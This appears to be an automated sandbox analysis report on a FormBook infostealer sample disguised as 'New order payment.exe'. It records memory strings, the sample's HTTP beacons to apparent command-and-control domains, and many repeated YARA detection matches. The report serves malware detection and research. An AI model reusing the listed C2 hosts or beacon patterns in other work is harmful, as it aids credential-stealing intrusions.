0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
          Source: svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmpString found in binary or memory: http://181ue.com/sq.html?entry=
          Source: New order payment.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: New order payment.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
          Source: svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
          Source: svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
          Source: svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
          Source: svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmpString found in binary or memory: https://pre-mpnewyear.uc.cn/iceberg/page/log?domain=
          Source: svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmpString found in binary or memory: https://track.uc.cn/collect
          Source: unknownDNS traffic detected: queries for: www.salvationshippingsecurity.com
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=eYxsMd5wljUn1Fg6115NyaMNAPOWoN8Xbg1oh/XArMcWaLbikdCkMKkIXUVVkDc1SuQ5&5j=0BKPgh7X4n HTTP/1.1Host: www.salvationshippingsecurity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=RrR08BH4oIo+gx361vOF46QRRg434M3aJQMobyGncW6ZpM1n/iVBy8ajhiKV3UdnqaZn&5j=0BKPgh7X4n HTTP/1.1Host: www.heyunshangcheng.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&5j=0BKPgh7X4n HTTP/1.1Host: www.crisisinterventionadvocates.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=Js+sgmRaIVUq7qFzsJAJ+9AXXLZC0X79cc7qqoZBkLaFxYs1smoq8VOLmQUttipLhfLz&5j=0BKPgh7X4n HTTP/1.1Host: www.srchwithus.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&5j=0BKPgh7X4n HTTP/1.1Host: www.itskosi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=Mi491nAN/W8j69kCQou8To2ktmeGxZt9RYONiJPW2rEgEezOpzjOfOleU2kzp5ym9Hqq&5j=0BKPgh7X4n HTTP/1.1Host: www.sejiw3.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=FQ+FDzcRNFqTHDas5QzX/ZxEACq3iyWpSRLff56TNweY9Uo4XxUeKhcbnwpchSkctfqz&5j=0BKPgh7X4n HTTP/1.1Host: www.hanansalman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: New order payment.exe, 00000000.00000002.244197590.000000000074A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.New order payment.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.New order payment.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New order payment.exe.f020000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New order payment.exe.f020000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 1.2.New order payment.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.New order payment.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.New order payment.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.New order payment.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.New order payment.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.New order payment.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.New order payment.exe.f020000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.New order payment.exe.f020000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.New order payment.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.New order payment.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.New order payment.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.New order payment.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.New order payment.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.New order payment.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.New order payment.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.New order payment.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.New order payment.exe.f020000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.New order payment.exe.f020000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: New order payment.exe
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: New order payment.exeStatic file information: Suspicious name
          Source: New order payment.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.2.New order payment.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.New order payment.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.New order payment.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.New order payment.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.New order payment.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.New order payment.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.New order payment.exe.f020000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.New order payment.exe.f020000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.New order payment.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.New order payment.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.New order payment.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.New order payment.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.New order payment.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.New order payment.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.New order payment.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.New order payment.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.New order payment.exe.f020000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.New order payment.exe.f020000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
